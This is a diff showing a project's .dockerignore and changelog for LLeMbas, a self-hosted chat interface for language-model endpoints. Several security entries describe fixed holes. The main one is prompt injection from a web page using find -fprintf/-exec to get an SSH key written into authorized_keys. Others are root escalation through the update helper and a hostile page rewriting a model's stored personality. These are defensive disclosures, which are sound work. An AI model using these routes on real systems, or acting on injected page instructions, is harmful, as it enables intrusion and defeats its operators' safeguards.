Compare commits
49
Commits
v1.4.0
..
8a3a225fea
@@ -1,31 +0,0 @@
|
||||
# What must never reach the image.
|
||||
#
|
||||
# The first two blocks are the ones that matter: a `data/` directory copied in
|
||||
# would bake somebody's database, their uploads and their encrypted API keys
|
||||
# into an image, and a `.env` would bake the key that decrypts them.
|
||||
data/
|
||||
*.db
|
||||
*.db-wal
|
||||
*.db-shm
|
||||
.env
|
||||
.env.*
|
||||
lembas.env
|
||||
|
||||
# `.git` is excluded and that has a consequence worth knowing: /admin/updates
|
||||
# reads it to say what is running, so inside a container that page says "not
|
||||
# installed from a checkout" and offers nothing. That is correct -- a container
|
||||
# is updated by pulling a new image, not by resetting a checkout inside it.
|
||||
.git/
|
||||
.github/
|
||||
|
||||
.venv/
|
||||
venv/
|
||||
__pycache__/
|
||||
*.pyc
|
||||
.pytest_cache/
|
||||
.ruff_cache/
|
||||
htmlcov/
|
||||
.coverage
|
||||
dist/
|
||||
build/
|
||||
*.egg-info/
|
||||
-802
@@ -1,802 +0,0 @@
|
||||
# Changelog
|
||||
|
||||
What changed, per version, for somebody using or running LLeMbas — not a
|
||||
restatement of the commit log. If a change fixed something that *looked* like it
|
||||
worked, that is worth a line: those are the ones nobody would otherwise know to
|
||||
stop working around.
|
||||
|
||||
Newest first. Versions are `__version__` in `src/lembas/__init__.py`, which is
|
||||
the only place a version is written.
|
||||
|
||||
The first tagged release is **1.0.0**. Everything below it shipped as a running
|
||||
deployment rather than as a release, and is recorded here so the release notes
|
||||
for 1.0.0 have something to be assembled from.
|
||||
|
||||
---
|
||||
|
||||
## Unreleased
|
||||
|
||||
## 1.4.0
|
||||
|
||||
- **Models can be told about each other.** A model may now be given a list of
|
||||
the other models on this instance — their names, the id to refer to one by, and
|
||||
what each is for — so that it knows what else is available and what each is
|
||||
better at. The list is built per person from the models *they* can reach, so it
|
||||
never names one they have no access to.
|
||||
|
||||
Each model's page has a new **Facts for other models** box for this: parameters,
|
||||
quantisation, a benchmark figure, what it is bad at. The existing description is
|
||||
used too, so filling in nothing at all still produces a usable list — but note
|
||||
that the description is now read by models as well as by people.
|
||||
|
||||
- **A model can ask another model a question.** New **Ask another model** switch
|
||||
on each model's page and a matching permission. The model picks who to ask from
|
||||
the list above, writes the question, and gets that model's answer back to use —
|
||||
a second opinion from something that is better at the subject, or a check on its
|
||||
own reasoning by something that will not make the same mistakes.
|
||||
|
||||
The model answering sees only the question, not the conversation; it answers as
|
||||
itself, and it is told to say so if it thinks the question is wrong. It cannot
|
||||
ask anybody anything in turn, and it cannot pass the question on.
|
||||
|
||||
It shares the **Helpers** switch and allowance on Admin → Agents, because it
|
||||
costs the same thing: one reply setting another reply going. On a single local
|
||||
endpoint that also means a model swap out and back, so it is not free.
|
||||
|
||||
- **A model can have a personality of its own, and keep its own read of you.**
|
||||
New **Edit its own personality** switch per model. Its character is carried into
|
||||
every conversation rather than being an instruction for one, and it is the model
|
||||
that writes it — you can seed it, read it, and put any earlier version back from
|
||||
the **Personality** card on the model's page. Every version is kept.
|
||||
|
||||
Separately, each model keeps its own impression of how you work: what you
|
||||
expect, how you like being answered, what keeps going wrong between you. Its
|
||||
point of view rather than facts about you, which is what a memory is for. It is
|
||||
per model and per person — two models may honestly reach different conclusions
|
||||
about you, and nobody on a shared instance inherits anybody else's.
|
||||
|
||||
**You can read and delete all of it**, under Memory in your own settings. That
|
||||
is the whole reason a model is allowed to keep one.
|
||||
|
||||
Two honest limits. A model that has just read a hostile web page can rewrite its
|
||||
own character; what stops that being permanent is that every version is kept and
|
||||
visible, not that it was prevented — the same position this takes on
|
||||
model-written skills. And neither is available to a model running as somebody's
|
||||
helper, answering another model's question, or working through a schedule: those
|
||||
run on words nobody is watching being written.
|
||||
|
||||
- Fixed: **the model chosen to review generated images was silently forgotten**
|
||||
whenever a connection was refreshed while its endpoint happened not to be
|
||||
listing that model. Nothing failed — reviewing fell back to the chat's own
|
||||
model, so pictures were being judged by a model you had not chosen, with nothing
|
||||
saying so. Existing settings keep working.
|
||||
|
||||
- Fixed: **editing a message could leave one of the messages below it behind.**
|
||||
Only when two were written in the same millionth of a second, which is exactly
|
||||
what happens to a question and the reply being started for it — so the orphan
|
||||
stayed in the conversation and in everything sent to the model afterwards.
|
||||
|
||||
## 1.3.2
|
||||
|
||||
- Fixed: **the model page could not save anything below the reasoning efforts**,
|
||||
and had not been able to since 1.3.0. "Save changes" did nothing at all — not
|
||||
slowly, not with an error, simply nothing — so the description, the system
|
||||
prompt, every capability and tool switch, and the whole availability card
|
||||
(enabled, pinned, available to everyone, groups) silently would not take. The
|
||||
fields above it, including the display name and the reasoning efforts, saved
|
||||
normally, which is what made it look like it worked.
|
||||
|
||||
Worse, the **Detect from the endpoint** button had stopped detecting. It
|
||||
submitted the page as an ordinary save instead — a save carrying only the top
|
||||
half of the form, so everything below took its empty default: it would have
|
||||
cleared that model's description and system prompt and switched the model off
|
||||
with all of its tools disabled. If you pressed it, check that model's page.
|
||||
|
||||
The cause was one HTML rule: a form inside another form is not allowed, and
|
||||
rather than complaining, a browser discards the inner tag and lets the closing
|
||||
tag end the *outer* form. Everything after that point was in no form, and a
|
||||
button in no form does nothing. Nothing in the markup looks wrong, and no test
|
||||
that posts to a route can see it — so the fix comes with one that reads every
|
||||
page the way a browser parses it.
|
||||
|
||||
## 1.3.1
|
||||
|
||||
- Fixed: **updating to 1.2.0 or later broke every page that lists models**, with
|
||||
a 500 and nothing but the error page to show for it. The per-model reasoning
|
||||
effort list added in 1.2.0 was the first list-shaped setting this application
|
||||
had ever added to a table that already had rows in it, and the code that fills
|
||||
in such a column on existing rows could not tell a list from a dictionary — so
|
||||
it wrote the wrong kind of empty value into every model, and reading one back
|
||||
raised rather than returning nothing.
|
||||
|
||||
A fresh install was never affected, which is exactly why it was not caught:
|
||||
the column is only filled in that way on a database that already existed.
|
||||
|
||||
This release both stops it happening and **puts right the rows already
|
||||
written**, on start, with nothing to run by hand. If your instance is showing
|
||||
the error page, updating is the whole fix.
|
||||
|
||||
## 1.3.0
|
||||
|
||||
- **A model's reasoning efforts can now be detected rather than known.** There
|
||||
is a button on the model's page that asks the endpoint what its chat template
|
||||
actually accepts, and ticks those. llama.cpp publishes the loaded model's
|
||||
template, and that template is the very thing that rejects an effort it does
|
||||
not recognise — so the answer is read from the place that is authoritative
|
||||
instead of guessed at, or discovered by a failed reply.
|
||||
- Endpoints that do not publish a template — OpenAI, vLLM — say so plainly
|
||||
rather than being recorded as accepting nothing.
|
||||
|
||||
## 1.2.0
|
||||
|
||||
- Fixed: **choosing a reasoning effort could kill the reply outright**, with a
|
||||
Jinja traceback where the answer should have been. Reasoning effort is sent
|
||||
two ways, and the second — `chat_template_kwargs` — is rendered into the
|
||||
model's own chat template, which does not ignore a value it has never heard
|
||||
of: it raises, and the whole request fails. The catch is that the vocabulary
|
||||
is **not the same for every model**. gpt-oss takes `low/medium/high`; Bonsai
|
||||
takes `low/medium/xhigh` and refuses `high`; OpenAI has added `minimal`,
|
||||
`xhigh` and `max` at various points. This application offered the same three
|
||||
to everything, so on some models the top setting was one the model would
|
||||
throw for.
|
||||
- **A model now has its own list of the efforts it accepts**, on its page under
|
||||
Models, and the composer's picker and `/effort` offer only those. Tick none
|
||||
and the familiar three are used, which is right for nearly everything.
|
||||
- **And it corrects itself.** If an endpoint refuses an effort anyway — a model
|
||||
swapped underneath a name, a runtime upgraded — that reply is retried once
|
||||
without it instead of being lost, and the model's list is narrowed so the
|
||||
menu stops offering something that does not work. Where the endpoint says
|
||||
what it *does* take, that is what gets stored.
|
||||
- `/effort` now reads the levels from the picker rather than from a second copy
|
||||
of the list kept in the browser, so the two can no longer disagree about what
|
||||
a valid effort is.
|
||||
|
||||
## 1.1.2
|
||||
|
||||
Two things a phone found that 1.1.0's phone pass had not.
|
||||
|
||||
- Fixed: **the administration area could not be navigated on a phone.** Admin
|
||||
has a nav of its own rather than the chat sidebar, and 1.1.0 gave every
|
||||
sidebar the drawer behaviour — starts closed, slides in — without giving that
|
||||
one any of the drawer's furniture. So it sat off-screen with no button to open
|
||||
it, no close, and nothing to tap beside it: every administration page was
|
||||
reachable and then a dead end. It now opens, closes and dims the page like the
|
||||
other one, and a test refuses any future sidebar that cannot be opened.
|
||||
- Fixed: **the chat gave nearly a quarter of a phone screen to margins**, so
|
||||
anything that could not wrap had to be scrolled to sideways. The thread's side
|
||||
padding is halved, and the speaker's avatar moves above the turn instead of
|
||||
sitting in a 44px column beside every line of it — a code block gained about
|
||||
sixty pixels of readable width.
|
||||
- Fixed: **the chat's title was squeezed to nothing.** The row's designated
|
||||
shrinker is hidden below a tablet width, so on a phone the controls went rigid
|
||||
and asked for 317 pixels of a 390 pixel bar; the heading was not truncated, it
|
||||
simply stopped occupying space. The model picker gives now, and on a phone it
|
||||
shows its avatar rather than its name — the name is one tap away and the
|
||||
title is not.
|
||||
- Tick boxes and the smaller buttons are big enough to hit on a phone. A
|
||||
checkbox is drawn by the browser at about sixteen pixels whatever the type
|
||||
around it, which made it the smallest target in the application by some way,
|
||||
and the admin lists are mostly checkboxes.
|
||||
- Fixed: **icon buttons could be squashed below their own size.** The sidebar
|
||||
toggle measured eighteen pixels across on a phone, under half its target,
|
||||
because a full row shrank the button rather than the text beside it.
|
||||
|
||||
## 1.1.1
|
||||
|
||||
One bug, and it is the one that made 1.1.0 look broken the moment you updated to
|
||||
it. If you saw a stray ✕ beside the logo on a desktop, controls that looked
|
||||
half-styled, or a page that would not scroll, this is why — and none of it was
|
||||
in the code you were running; it was the code your browser had *not* fetched.
|
||||
|
||||
- Fixed: **updating showed you the new page drawn with the old stylesheet.**
|
||||
Pages are always fetched fresh, while the CSS and JavaScript beside them come
|
||||
from the cache the offline support keeps — and that cache was keyed on the
|
||||
release while the files inside it were not. For as long as the previous
|
||||
release's worker was still in charge, you got 1.1.0's markup over 1.0.x's
|
||||
stylesheet: a close button meant for the phone drawer appeared on the desktop
|
||||
with nothing to style or place it, and anything else the new layout depended
|
||||
on was simply absent. Every asset now carries the release in its address, so
|
||||
a new page cannot be handed an old stylesheet whatever the cache holds.
|
||||
|
||||
It is self-correcting: updating to this version is enough, and no cache needs
|
||||
clearing.
|
||||
|
||||
- The sidebar header is two slots — the name, and a rail on the right for the
|
||||
drawer's own controls — instead of a brand with a button appended to it. The
|
||||
close button sits in that rail, at the top right where it belongs, and a
|
||||
second control added later lands beside it rather than pushing the name
|
||||
around.
|
||||
|
||||
## 1.1.0
|
||||
|
||||
Mostly about using this on a phone, where it turns out a good deal of it could
|
||||
not be used at all.
|
||||
|
||||
### The sidebar on a phone
|
||||
|
||||
- Fixed: **the sidebar opened over the page on every phone, and the button that
|
||||
closes it was underneath it.** Below a phone width the sidebar is a 280px
|
||||
panel laid over the page; nothing ever closed it, and the only control that
|
||||
could was in the bar behind it. It now starts closed at that width, slides in
|
||||
when you ask for it, dims the page behind it, and closes by tapping beside it,
|
||||
by Escape, or by its own button — which is inside the drawer, where you can
|
||||
reach it.
|
||||
- Fixed: **seven of the eight pages with a sidebar had no way to show or hide it
|
||||
at all.** Only the chat page ever had that button. Settings, Messages,
|
||||
Reports, Scheduled, Library, Connections and a folder's own page did not —
|
||||
which on a phone meant arriving at a page already covered by a panel with
|
||||
nothing to do about it. Settings is where the Install and Notifications
|
||||
buttons live, so this was also why they were hard to reach.
|
||||
- The toggle no longer claims the sidebar is open when it is not, which matters
|
||||
to anyone using a screen reader.
|
||||
|
||||
### Anything you tap
|
||||
|
||||
- **Every control is now at least 44px on a touch screen**, instead of 36px —
|
||||
or 28px for the small ones, which included renaming and deleting a chat, all
|
||||
seven actions on a message, and every panel's close button. The dismiss button
|
||||
on a notification had no size of its own at all and was about 18 by 7 pixels.
|
||||
- Fixed: **renaming or deleting a chat, and copying, editing, regenerating or
|
||||
reading aloud a message, were impossible on a phone.** All of them appeared on
|
||||
hover, and there is no hover on a phone; tapping the row simply opened it.
|
||||
- Fixed: **the settings tabs scrolled sideways with nothing to say so**, hiding
|
||||
Appearance, Memory and Security off the right-hand edge of a phone screen.
|
||||
There is a fade at the edge now, and a flick lands on a tab.
|
||||
- Installed on an iPhone, the page ran underneath the clock and the home
|
||||
indicator. It no longer does.
|
||||
|
||||
### Installing it
|
||||
|
||||
- The install prompt now offers the richer dialog rather than the terse bar, and
|
||||
a long press on the icon offers New chat, Messages and Scheduled.
|
||||
- Fixed: **a light-themed instance installed to a phone showed a near-black
|
||||
splash screen and then opened parchment**, and every page load flashed dark
|
||||
browser chrome before the stylesheet had run. Both follow the theme now.
|
||||
- Fixed: **a new version used to take over pages you were reading**, swapping
|
||||
the stylesheets under an open tab while it emptied the cache they came from.
|
||||
It waits and offers you a reload instead.
|
||||
- Fixed: the small mark beside a notification on Android was a solid grey
|
||||
square, because the icon it used has no transparency to be cut from.
|
||||
- Fixed: notifications silently stopped working for good if the browser ever
|
||||
replaced its own subscription, which browsers do.
|
||||
- Pages start loading a little sooner, and the two icons a launcher actually
|
||||
crops are now kept for offline use.
|
||||
|
||||
### Things that move
|
||||
|
||||
- **Every request the application makes now says it is happening**, with a thin
|
||||
bar across the top of the window. Nothing did before, so anything slower than
|
||||
a few milliseconds looked like a click that had not registered.
|
||||
- The thinking indicator turns rather than fading, so a model that is working
|
||||
and one that has stopped no longer look alike.
|
||||
- Dialogs, the drawer and the panels arrive and leave rather than appearing;
|
||||
buttons answer a press; cards lift under the pointer. All of it stops if you
|
||||
have asked your system for reduced motion.
|
||||
|
||||
### Archiving
|
||||
|
||||
- **A chat can be archived** — out of the list, into a group at the bottom of the
|
||||
sidebar, and back again whenever you like. The setting behind this has existed
|
||||
and been honoured since folders arrived; nothing had ever been able to switch
|
||||
it on.
|
||||
|
||||
### Smaller things
|
||||
|
||||
- **Extra headers can be set on a connection.** They were sent with every
|
||||
request already and no form could write them, so OpenRouter's attribution
|
||||
headers were documented and unreachable.
|
||||
- A model is no longer told that it will hear when a background job finishes on
|
||||
instances where that notification is switched off.
|
||||
- The guidance for asking you a question can now be edited like every other
|
||||
piece of the prompt. It was the only one that could not be.
|
||||
- Several controls that a screen reader announced as nothing now have names, and
|
||||
two lists that claimed to be tab strips now describe themselves honestly.
|
||||
- Borders resolve through a token like every other value, so a theme can change
|
||||
one. They were a literal `1px` in about ninety places, which was the largest
|
||||
patch of hard-coded value left in the stylesheets.
|
||||
- `chat.css` may now contain media queries. It was forbidden them, for a good
|
||||
reason that had stopped applying: what the ban protected is asserted directly
|
||||
now, which is both narrower and stronger.
|
||||
|
||||
## 1.0.4
|
||||
|
||||
Six things that looked like they worked. Five of them were found by reading the
|
||||
code rather than by anybody reporting them, which is what they have in common:
|
||||
none of these fails loudly, and two of them correct themselves if you reload.
|
||||
|
||||
- Fixed: **a reply lost the model's name and picture the moment it finished.**
|
||||
While a reply streams it is attributed correctly; at the instant it lands, the
|
||||
frame that replaces the bubble was looking the models up as nobody, and "no
|
||||
user" answers "no models" rather than "all models". So a finished reply swapped
|
||||
the model's avatar for the plain leaf mark, put the instance's name where the
|
||||
model's should be, and grew a raw model id beside it. Reloading the page put it
|
||||
all back, which is why this survived a release: it is only ever wrong until you
|
||||
look away.
|
||||
- Fixed: **a limit on how many replies an account may write at once could be
|
||||
stepped over by pressing New chat.** It was enforced when sending into a chat
|
||||
that already existed and nowhere else — not on a new chat, not on editing an
|
||||
earlier message, not on sending a queued one, and not on regenerating. Four of
|
||||
the six ways to start a reply ignored it, including the commonest.
|
||||
- Fixed: **a custom theme's confirmations and warnings kept the built-in
|
||||
theme's colour behind them.** Setting `success` or `warning` moved the text and
|
||||
left the background it sits on, because the faded companion colour was derived
|
||||
for three of the five settable colours. Visible on every alert and badge of
|
||||
those two kinds, on the "on" state in the permissions list, and on the added
|
||||
lines of every diff in an agent chat.
|
||||
- Fixed: **on a phone, every page with a sidebar could be scrolled past its own
|
||||
bottom into empty background.** The shell was sized to the part of the screen
|
||||
you can actually see and the document around it to the part you can see with
|
||||
the browser's toolbar retracted; the difference between those is real on a
|
||||
phone and nil on a desktop, which is why it was never noticed on one. Reported
|
||||
on Settings and true everywhere. A flick that ran off the end of a list now
|
||||
stops there as well, instead of dragging the page behind it.
|
||||
- Fixed: **the conversation was rendering every assistant message twice on every
|
||||
page load** — once into Markdown that nothing read, and once the way it is
|
||||
actually shown. The same was true of Messages, for your own turns. Nothing
|
||||
looked wrong; a long conversation was simply slower to open than it needed to
|
||||
be, every time, along with every rewind and every compaction.
|
||||
- Fixed: a test file meant to skip itself on a machine without `setsid` never
|
||||
did, because it set its marker twice and the second one replaced the first.
|
||||
- Removed: an endpoint serving a message's unrendered Markdown, which nothing
|
||||
had ever called — the copy button reads the page it is already on.
|
||||
|
||||
## 1.0.3
|
||||
|
||||
Two Arch-isms in the installer, both of which only a Debian machine could find.
|
||||
`deploy/lxc-install.sh` had never been executed — it was reviewed and
|
||||
syntax-checked, which is not the same claim — and running it is what found them.
|
||||
|
||||
- Fixed: **`deploy/install.sh` could not create its virtualenv on Debian**, and
|
||||
so `deploy/lxc-install.sh` could not finish. It called bare `python`, which is
|
||||
Python 3 on Arch — the machine this was written and only ever run on — and
|
||||
does not exist on Debian at all unless `python-is-python3` is installed. The
|
||||
LXC bootstrap installs `python3`, so the install aborted at the virtualenv
|
||||
step with the service user, the bind mount and the clone already made. It now
|
||||
calls `python3`, which is right on both.
|
||||
- Fixed: the service account was created with `--shell /usr/bin/nologin`, which
|
||||
is where Arch keeps it and where Debian does not. Nothing invoked it — `sudo -u`
|
||||
execs directly and systemd's `User=` never reads a shell — so the account
|
||||
worked either way, but it was created pointing at a file that was not there.
|
||||
Now `/usr/sbin/nologin`, which is correct on Debian and resolves on Arch too,
|
||||
since Arch's `/usr/sbin` is a symlink to `bin`.
|
||||
|
||||
## 1.0.2
|
||||
|
||||
- **The documentation moved to the [wiki](https://git.houmeres.sk/Houmeres/LLeMbas/wiki).**
|
||||
`CLAUDE.md`, `PLAN.md` and `docs/` are gone from the repository: they are
|
||||
documentation *about* this project rather than part of it, and a clone should
|
||||
carry software. Nothing was lost — the working notes, the roadmap and the eight
|
||||
topic notes are all there, with every internal link rewritten, and the README
|
||||
now opens onto them. Where a source comment said "see `CLAUDE.md`" it now says
|
||||
"see the working notes".
|
||||
- Entries below this one still name `PLAN.md` and `docs/notes/…`, and are left as
|
||||
they were written. A changelog records what happened at the time; rewriting old
|
||||
entries to match a later decision makes it a worse record, not a better one.
|
||||
|
||||
## 1.0.1
|
||||
|
||||
- Fixed: the Updates page showed **"v1.0.0 (reports 1.0.0)"** — two spellings of
|
||||
one version, in a note whose whole purpose is to warn that a tag was cut
|
||||
before the version bump. `git describe` answers with the tag's name, and tags
|
||||
here carry a `v`. Found by cutting the first release, which is the only place
|
||||
it could have been.
|
||||
|
||||
## 1.0.0
|
||||
|
||||
The first release. Every version before it shipped as a running deployment
|
||||
rather than as a release; this is what those add up to, and the point at which
|
||||
it is worth somebody else installing.
|
||||
|
||||
**What it is.** A self-hosted web interface for OpenAI-compatible endpoints.
|
||||
Server-rendered, no build step, no CDN, one SQLite file. Point it at whatever
|
||||
you run — llama.cpp, LM Studio, vLLM, Ollama, OpenRouter, OpenAI — and it works
|
||||
the same.
|
||||
|
||||
### What arrived since 0.8.1
|
||||
|
||||
- **Things that happen because time passed.** Say "every Monday at nine" and a
|
||||
model sets it up itself, against the same recurrence rule the manual form
|
||||
uses. A run can file a **report** you read later, send you a message, or work
|
||||
in a chat of its own.
|
||||
- **News that finds you.** A dot in the sidebar, a count in the tab title while
|
||||
you are looking elsewhere, and **web push** so a schedule firing at seven in
|
||||
the morning reaches a browser that is shut. Opt-in per device, and the one
|
||||
thing here that contacts an outside service — `services/push.py` says so
|
||||
plainly and says what it costs.
|
||||
- **Helpers.** A reply can hand a self-contained piece of work to another model
|
||||
that runs on its own and reports back, several at once. A helper cannot ask
|
||||
questions, cannot send helpers of its own, changes nothing unless asked, and
|
||||
on a machine runs only a fixed list of read-only commands.
|
||||
- **Drawing.** Point it at a ComfyUI and a model can make images, against
|
||||
workflow templates and defaults you set — size, steps, sampler, scheduler,
|
||||
checkpoint. It reviews its own result and can try again.
|
||||
- **Semantic search.** Pick an embedding model and library search fuses keyword
|
||||
and meaning, so *"how do I get paid"* finds a document that says *"invoicing"*.
|
||||
Choosing none is not a degraded mode: it is byte-for-byte the keyword search
|
||||
that was always there, with nothing written and no requests made.
|
||||
- **Quotas and sharing.** Monthly tokens, concurrent replies, agent wall clock,
|
||||
images a day, helpers a reply — resolved by maximum across a person's groups,
|
||||
with zero meaning *no limit*. Documents, notes, skills and reports can be
|
||||
handed to a group or a person, read-only, with a *Shared with me* filter
|
||||
everywhere. And a screen that answers **"what can this account actually do?"**
|
||||
by naming where each permission came from.
|
||||
- **Make it yours.** Name, tagline, logo, favicon and launcher icons; the
|
||||
Middle-earth wording is editable data; custom themes defined as a set of
|
||||
colours rather than a stylesheet.
|
||||
- **Install it and update it.** A Dockerfile, a Proxmox container script, and an
|
||||
`/admin/updates` page showing what is running, what is available and what
|
||||
changed between. The button that applies an update is opt-in and cannot do the
|
||||
work itself — it writes a file that a systemd unit picks up, because a web
|
||||
application that can restart its own service is one whose worst day is much
|
||||
worse.
|
||||
|
||||
### The part worth reading
|
||||
|
||||
Five audit passes went into this release rather than one, and they found things
|
||||
that had shipped looking correct. These are the entries somebody stops working
|
||||
around a bug because of:
|
||||
|
||||
- **Every model was told the time in a zone with no name** — on any account that
|
||||
had not chosen one, which is every account by default.
|
||||
- **A helper could write files and run programs on a remote machine,
|
||||
unattended, in a mode that promises to change nothing.** `find` was on the
|
||||
read-only command list, and `find -fprintf` writes a file.
|
||||
- **Two ways to get root out of the update helper**, one of which needed no
|
||||
compromise at all: root ran a script the unprivileged service account owns,
|
||||
and an update fetches that script as that account.
|
||||
- **Deleting a chat left every file it held on disk** — attachments, generated
|
||||
images, all of it, with nothing that would ever look at them again.
|
||||
- **Folder nesting was fully built, documented in the README, and reachable by
|
||||
nothing.** So was moving a chat into a folder.
|
||||
- **The terminal silently stopped accepting input after a reconnect**, while
|
||||
output kept arriving so the panel looked healthy.
|
||||
- **On the Messages screen, half the keyboard shortcuts did nothing**, because
|
||||
two scripts were loaded twice and each toggle ran twice.
|
||||
- **The prompt preview could not show two thirds of what it previews.**
|
||||
- **Hints and timestamps failed the contrast minimum in both themes.**
|
||||
|
||||
### Where the edges are
|
||||
|
||||
Stated because they are the things worth knowing before you rely on it:
|
||||
|
||||
- **Nothing executes on the machine LLeMbas runs on.** Agent chats run their
|
||||
commands over SSH on a host you choose, and the security of an agent chat is
|
||||
the security of that host. There is no sandbox here and that is deliberate —
|
||||
`PLAN.md` records the one that was designed and dropped, and why.
|
||||
- **One worker.** The generation registry, the terminal sessions and the
|
||||
schedule ticker are all in-process. Two workers means two tickers and every
|
||||
schedule firing twice.
|
||||
- **A restart abandons replies in flight**, keeping whatever each had.
|
||||
- **Schema changes are additive.** New tables and columns apply themselves at
|
||||
startup; renames and drops are manual. The upgrade path is tested from an
|
||||
0.8.1-shaped database with rows in it.
|
||||
- **Sharing grants reading only.**
|
||||
|
||||
2283 tests on Python 3.11, 3.12 and 3.14.
|
||||
|
||||
## 0.9.13
|
||||
|
||||
**The testing pass.** 2140 tests became 2283, and writing them found four bugs
|
||||
that no amount of reading had.
|
||||
|
||||
- Fixed: **the terminal silently stopped accepting input after a reconnect.**
|
||||
Change the connection, or let the shell catch up after falling behind, and
|
||||
every keystroke was dropped from then on — while output kept arriving, so the
|
||||
panel looked perfectly healthy. It also announced "Disconnected. Close and
|
||||
reopen to reconnect." about a shell that had just reconnected successfully.
|
||||
- Fixed: **on the Messages screen, half the keyboard did nothing.** Two scripts
|
||||
were loaded twice there, so `Alt+B`, `Alt+E`, `Alt+T` and `Alt+I` toggled
|
||||
their panel twice — which is to say not at all — while `/help` opened two
|
||||
dialogs, `/image` posted the message twice, and picking an `@` mention
|
||||
attached the file twice.
|
||||
- Fixed: **pressing the microphone while the permission prompt was up opened a
|
||||
recording each time.** Only the last was stopped, so the browser's recording
|
||||
indicator stayed on until the tab was closed.
|
||||
- Fixed: **a skill shared with you took its name out of your own library.**
|
||||
Creating your own was refused with "a skill called that already exists. Edit
|
||||
it instead" — naming a skill you cannot edit, because sharing grants reading
|
||||
only. The model's `skill_create` hit the same dead end. Sharing a curated
|
||||
skill with a team is what sharing is *for*.
|
||||
- Hints and timestamps are readable now. `--ink-faint` failed the accessibility
|
||||
contrast minimum in **both** themes — 3.85:1 in Moria, 3.19:1 in Shire, where
|
||||
4.5:1 is the bar — so the smallest text on every screen was the hardest to
|
||||
read.
|
||||
- The suite runs on **Python 3.11 and 3.12** as well as 3.14. It had only ever
|
||||
run on 3.14, while the Docker image ships 3.12 and the packaging claimed 3.11
|
||||
— so the one interpreter most people would actually run was the one nothing
|
||||
had tested.
|
||||
- A `docs/notes/release-checklist.md` for the half of testing a machine cannot
|
||||
do: a real endpoint, a real machine, real hardware, a real pair of eyes.
|
||||
|
||||
## 0.9.12
|
||||
|
||||
**The security pass.** Six findings, all fixed. None is reachable by simply
|
||||
visiting the site; every one of them is a boundary that was supposed to hold
|
||||
and did not.
|
||||
|
||||
- Fixed: **a helper could write files and run programs on the remote machine,
|
||||
unattended, in a mode that promises to change nothing.** A subagent is pinned
|
||||
to a fixed list of read-only commands — and `find` was on it. `find -fprintf`
|
||||
writes a file, `find -exec` runs a program, `find -delete` removes one, and
|
||||
none of them needs a character the shell-metacharacter guard refuses. A page
|
||||
the model had just read could have asked for a helper and got an SSH key
|
||||
written into `authorized_keys`. Those flags are refused outright now, whatever
|
||||
list a command is on.
|
||||
- Fixed: **an SSH connection could be pointed at `0.0.0.0` and reach the machine
|
||||
LLeMbas runs on**, with the "may a connection point here" setting still
|
||||
reading *off*. Every other spelling was caught; that one is neither a real
|
||||
destination nor a refused one, and connecting to it goes to localhost.
|
||||
- Fixed, twice, in the update helper — the one place this deliberately crosses a
|
||||
privilege boundary: **root ran a script the unprivileged service account
|
||||
owns**, and **root sourced a file that account can replace**. Either turns a
|
||||
compromise of the web application into root on the host, which is exactly what
|
||||
the unprivileged split exists to prevent. The first also meant control of the
|
||||
branch was control of root, with no compromise needed at all.
|
||||
**If you installed the update helper before this, re-run the installer** —
|
||||
the old wiring stays until you do, and the update script now says so loudly
|
||||
when it notices.
|
||||
- Fixed: **browser notification endpoints skipped the guard that stops the
|
||||
server being aimed at your own network.** It was the only outbound request in
|
||||
the codebase not going through it.
|
||||
- Fixed: **a chat could be put in another account's folder**, and a folder hands
|
||||
its system prompt to the chats inside it — so that read a setting across an
|
||||
ownership boundary through a field that looks like a tag.
|
||||
- Fixed: a `"` typed into the share panel's search box silently stopped every
|
||||
checkbox in the panel from doing anything.
|
||||
- Fixed: **re-running the installer moved the update channel to `stable`** even
|
||||
on a host following `edge`. The channel lives in two places — the environment
|
||||
file the page reads and the systemd unit the button obeys — and a re-run kept
|
||||
the first while rewriting the second, so an install for some unrelated reason
|
||||
left the page naming one channel and the button deploying another. It now
|
||||
defaults to what the host already follows.
|
||||
|
||||
## 0.9.11
|
||||
|
||||
- The Updates page no longer runs the **Check the remote** button flush against
|
||||
the version and commit above it, where the two read as one block.
|
||||
|
||||
## 0.9.10
|
||||
|
||||
**The second audit pass: screens that were harder to use than they needed to
|
||||
be.** Checked by rendering them in a real browser and measuring, not by reading
|
||||
the CSS.
|
||||
|
||||
- Fixed: **the Prompts admin page put its reference material first.** The
|
||||
Variables legend and the Preview run to a screen each and sat above the tabs,
|
||||
so the editor — the thing the page is for — started two screens down and every
|
||||
tab switch had to move the whole page to be any use. On a short tab it could
|
||||
not move far enough and left the panel stranded above a screenful of nothing.
|
||||
The editor comes first now, the reference after, and the tab bar stays put:
|
||||
measured, it moved 385→642px between tabs before and does not move at all now.
|
||||
The tab bar also sticks to the top, so a long panel does not scroll it away.
|
||||
- Fixed: **custom themes were three fixed slots.** A fresh instance opened on
|
||||
fifty-seven empty colour boxes under three identical headings, and a fourth
|
||||
theme could not be made at all. Now: one block per theme you have, plus one
|
||||
blank to add the next, with the colours behind a disclosure — so a theme is a
|
||||
name and a starting point until you ask for more. Up to twelve. The page is
|
||||
half the height it was.
|
||||
- Fixed: **deleting a chat left every file it held on disk.** The rows went —
|
||||
the message, the attachments, the generated images — and the files they named
|
||||
stayed, with nothing that would ever look at them again. Four of the five ways
|
||||
a chat can end had this: the delete button, a schedule's task chat, a helper's
|
||||
hidden chat, and deleting an account. There is one function that deletes a
|
||||
chat now, and it removes the files first.
|
||||
- Fixed, and it is what made the above invisible: **a file attached before the
|
||||
chat existed never learned which chat it belonged to.** Anything picked on the
|
||||
new-chat screen kept an empty `chat_id` for the rest of its life. Six things
|
||||
filter on that, so for those files the model was not told they were attached,
|
||||
the canvas would not open them, and the cleanup could not find them.
|
||||
- **Folders can be nested, which the README has always claimed.** The route has
|
||||
handled it since folders existed — cycle guard, depth limit — and the sidebar
|
||||
has always drawn a tree; there was simply no control that could ask for it.
|
||||
Moving a folder also respects the depth limit now, which only creating one did.
|
||||
- The Proxmox container installs the **update helper by default**. A container
|
||||
made thirty seconds ago to run one thing is not the shared host the plain
|
||||
installer has to be careful about, and an appliance you cannot update without
|
||||
a shell is one nobody updates. `INSTALL_UPDATE_HELPER=0` opts out. Docker
|
||||
deliberately has no equivalent: updating a container is pulling an image, and
|
||||
a helper inside one would need the Docker socket, which is root on the host.
|
||||
- The starting points on the new-chat screen are four new ones, aimed at
|
||||
somebody who has just stood an instance up and wants to know what is behind
|
||||
it. Only a fresh install gets them; an instance that has already seeded keeps
|
||||
whatever its administrator has made of the list.
|
||||
- `README.md` describes what this actually is again — schedules, reports,
|
||||
helpers, image generation, semantic search, quotas, sharing, branding and the
|
